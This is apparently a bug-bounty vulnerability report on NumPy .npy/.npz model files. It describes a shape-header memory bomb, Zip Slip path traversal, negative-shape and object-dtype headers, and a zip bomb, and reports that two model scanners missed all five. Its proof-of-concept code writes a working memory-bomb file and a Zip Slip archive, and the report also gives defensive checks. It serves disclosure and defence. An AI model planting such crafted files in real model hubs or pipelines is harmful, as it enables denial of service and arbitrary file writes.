NPY/NPZ: Memory Bomb via Crafted Shape, Zip Slip in NPZ Archives, Object Dtype Bypass

Summary

Three non-pickle attack classes against NumPy's .npy and .npz model file formats that bypass both picklescan 1.0.4 and modelscan 0.8.8 (100% evasion rate across 5 payloads):

  1. Memory bomb via crafted header shape: a .npy file whose header declares shape: (1000000, 1000000) but carries only 4 bytes of data triggers a 3.64 TiB allocation attempt, crashing the process. No pickle involved.
  2. Zip Slip in .npz archives: NPZ files are ZIP containers. Injecting ../../../tmp/pwned as a ZIP entry name achieves an arbitrary file write when the archive is extracted to disk.
  3. Object dtype forces pickle: setting descr: 'O' (object dtype) in the NPY header forces numpy onto its pickle deserialization path even when the user believes they are loading numeric data. allow_pickle=False does make np.load raise an error rather than unpickle, but the dtype is parsed from the header before that check runs, and the header itself can be crafted to confuse downstream tools.

Formats: NPY, NPZ ($1,500 MFV each)
Scanners tested: picklescan 1.0.4 + modelscan 0.8.8 (5/5 missed by both)

Payloads

| File | Attack | Impact | picklescan | modelscan |
| --- | --- | --- | --- | --- |
| npy_shape_bomb.npy | Header claims shape (1M, 1M); file has 4 bytes | MemoryError: Unable to allocate 3.64 TiB (DoS) | MISSED | MISSED |
| npy_negative_shape.npy | Header claims shape (-1,) | ValueError crash (DoS) | MISSED | MISSED |
| npy_object_descr.npy | Header sets descr: 'O' (object) | Forces pickle path, confuses tooling | MISSED | MISSED |
| npz_zipslip.npz | ZIP entry named ../../../tmp/pwned.txt | Arbitrary file write on extraction | MISSED | MISSED |
| npz_zipbomb.npz | 10 KB compressed → 10 MB+ decompressed | Decompression DoS | MISSED | MISSED |
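The zip-bomb payload in the last row can be screened before extraction by comparing the compressed sizes against the sizes declared in the ZIP central directory. A minimal sketch; `suspicious_ratio` and the `MAX_RATIO` threshold are our own assumptions, not part of any scanner:

```python
import io
import zipfile

import numpy as np

MAX_RATIO = 100  # assumed policy threshold: flag >100x expansion


def suspicious_ratio(raw: bytes) -> bool:
    """Flag archives whose declared decompressed size vastly exceeds the compressed size."""
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        comp = sum(info.compress_size for info in zf.infolist())
        decomp = sum(info.file_size for info in zf.infolist())
    return comp > 0 and decomp / comp > MAX_RATIO


# Highly compressible zeros mimic the report's 10 KB -> 10 MB payload.
raw = io.BytesIO()
with zipfile.ZipFile(raw, "w", zipfile.ZIP_DEFLATED) as zf:
    buf = io.BytesIO()
    np.save(buf, np.zeros(2_500_000, dtype="<f4"))  # ~10 MB of zeros
    zf.writestr("weights.npy", buf.getvalue())

print(suspicious_ratio(raw.getvalue()))  # True: deflated zeros expand ~1000x
```

The sizes come from `ZipInfo` metadata alone, so the check never decompresses anything.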

Vulnerability Details

Memory bomb (CWE-400)

The NPY format has a plain-text header containing a Python dict literal with descr, fortran_order, and shape. NumPy allocates product(shape) * dtype_size bytes based on the header, WITHOUT checking that the file actually contains that much data:

# Crafted NPY header:
# {'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}
# File is only 100 bytes total
# numpy tries to allocate 1M * 1M * 4 bytes = 4 TB → instant OOM

arr = np.load("npy_shape_bomb.npy")
# MemoryError: Unable to allocate 3.64 TiB

Attack: Upload to model hub → victim loads → process crashes → DoS on inference server.
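A load-time defense is to compare the byte count the header promises against what the file actually contains. The sketch below leans on `numpy.lib.format.read_magic` and `read_array_header_1_0` from NumPy's public format module; `craft_npy` and `header_matches_payload` are our own helpers (the former mirrors the proof of concept further down):

```python
import io
import math
import struct

import numpy as np
from numpy.lib import format as npy_format


def craft_npy(header_str, data=b""):
    """Minimal NPY v1.0 writer, as in the proof of concept."""
    magic = b"\x93NUMPY\x01\x00"
    header = header_str.encode("latin1")
    pad = 64 - (10 + len(header)) % 64  # pad total header to a 64-byte boundary
    header += b" " * (pad - 1) + b"\n"
    return magic + struct.pack("<H", len(header)) + header + data


def header_matches_payload(raw: bytes) -> bool:
    """True only if the header's claimed size equals the bytes actually present."""
    fp = io.BytesIO(raw)
    npy_format.read_magic(fp)  # validates the \x93NUMPY magic and version
    shape, _fortran, dtype = npy_format.read_array_header_1_0(fp)
    expected = dtype.itemsize * math.prod(shape)
    return expected == len(raw) - fp.tell()


bomb = craft_npy(
    "{'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}",
    b"\x00" * 4,
)
print(header_matches_payload(bomb))  # False: header claims ~4 TB, file has 4 bytes
```

Running the check before np.load turns the allocation attempt into a cheap rejection.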

Zip Slip (CWE-22)

NPZ files are standard ZIP archives. np.load() reads them in-memory (safe), but any tool that extracts NPZ files to disk (model registries, pipeline caches, data loaders) is vulnerable:

import zipfile, io, numpy as np

with zipfile.ZipFile("malicious.npz", 'w') as zf:
    buf = io.BytesIO()
    np.save(buf, np.array([1.0]))
    zf.writestr("weights.npy", buf.getvalue())
    zf.writestr("../../../tmp/pwned.txt", b"PWNED")

# np.load reads in-memory (safe)
# But: extractall(), shutil.unpack_archive(), or ZipFile.extract() write to disk
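Extractors can screen entry names before writing anything to disk. A minimal sketch, assuming a POSIX-style destination path; the `unsafe_entries` helper is ours:

```python
import io
import os
import zipfile

import numpy as np


def unsafe_entries(zf: zipfile.ZipFile, dest: str) -> list[str]:
    """Return entry names that would escape dest if extracted naively."""
    dest = os.path.realpath(dest)
    bad = []
    for name in zf.namelist():
        target = os.path.realpath(os.path.join(dest, name))
        if not target.startswith(dest + os.sep):
            bad.append(name)
    return bad


# Build the malicious archive in memory, mirroring the snippet above.
raw = io.BytesIO()
with zipfile.ZipFile(raw, "w") as zf:
    buf = io.BytesIO()
    np.save(buf, np.array([1.0]))
    zf.writestr("weights.npy", buf.getvalue())
    zf.writestr("../../../tmp/pwned.txt", b"PWNED")

with zipfile.ZipFile(io.BytesIO(raw.getvalue())) as zf:
    print(unsafe_entries(zf, "/srv/models"))  # lists only the traversal entry
```

Resolving each joined path with `realpath` before comparing prefixes also catches `..` segments hidden mid-path, not just leading ones.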

Negative shape (CWE-20)

Shape (-1,) is not validated in the header parser:

# Header: {'descr': '<f4', 'fortran_order': False, 'shape': (-1,)}
np.load("npy_negative_shape.npy")
# ValueError: Failed to read all data for array. Expected (-1,) = -1 elements

This causes inconsistent size calculations. Libraries wrapping numpy that compute total_size = product(shape) * itemsize get negative results → integer underflow.
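Such wrappers can validate the shape tuple before doing any size arithmetic. A sketch; the `MAX_ELEMENTS` budget is an arbitrary policy choice of ours:

```python
import math

MAX_ELEMENTS = 10**9  # assumed policy cap on element count; tune per deployment


def validate_shape(shape):
    """Reject non-tuple, non-integer, negative, or implausibly large header shapes."""
    if not isinstance(shape, tuple):
        raise ValueError(f"shape must be a tuple, got {type(shape).__name__}")
    if not all(isinstance(d, int) and d >= 0 for d in shape):
        raise ValueError(f"invalid dimension in shape {shape!r}")
    if math.prod(shape) > MAX_ELEMENTS:
        raise ValueError(f"shape {shape!r} exceeds element budget")


validate_shape((3, 4))    # passes
# validate_shape((-1,))   # raises ValueError: invalid dimension
```

The same check rejects the (1000000, 1000000) memory bomb, since its product exceeds any sane element budget.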

Proof of Concept

import struct, numpy as np, zipfile, io

# Memory bomb
def craft_npy(header_str, data=b''):
    magic = b'\x93NUMPY\x01\x00'
    header = header_str.encode('latin1')
    pad = 64 - (10 + len(header)) % 64
    if pad < 1: pad += 64
    header = header + b' ' * (pad - 1) + b'\n'
    return magic + struct.pack('<H', len(header)) + header + data

with open("npy_shape_bomb.npy", 'wb') as f:
    f.write(craft_npy("{'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}", b'\x00' * 4))

# Zip Slip
with zipfile.ZipFile("npz_zipslip.npz", 'w') as zf:
    buf = io.BytesIO(); np.save(buf, np.array([1.0]))
    zf.writestr("weights.npy", buf.getvalue())
    zf.writestr("../../../tmp/pwned.txt", b"PWNED via NPZ zip slip")
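The object-dtype payload from the table is crafted the same way. With allow_pickle=False (the default), np.load refuses it with a ValueError rather than unpickling; the helper is repeated here so the snippet stands alone:

```python
import io
import struct

import numpy as np


def craft_npy(header_str, data=b""):
    """Minimal NPY v1.0 writer, same as above."""
    magic = b"\x93NUMPY\x01\x00"
    header = header_str.encode("latin1")
    pad = 64 - (10 + len(header)) % 64
    header += b" " * (pad - 1) + b"\n"
    return magic + struct.pack("<H", len(header)) + header + data


# '|O' is the descr numpy itself writes for object arrays.
payload = craft_npy("{'descr': '|O', 'fortran_order': False, 'shape': (1,)}", b"\x00" * 8)
try:
    np.load(io.BytesIO(payload), allow_pickle=False)
except ValueError as exc:
    print("refused:", exc)
```

Note the header is fully parsed before the refusal fires, which is the window the report describes for confusing downstream tools.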
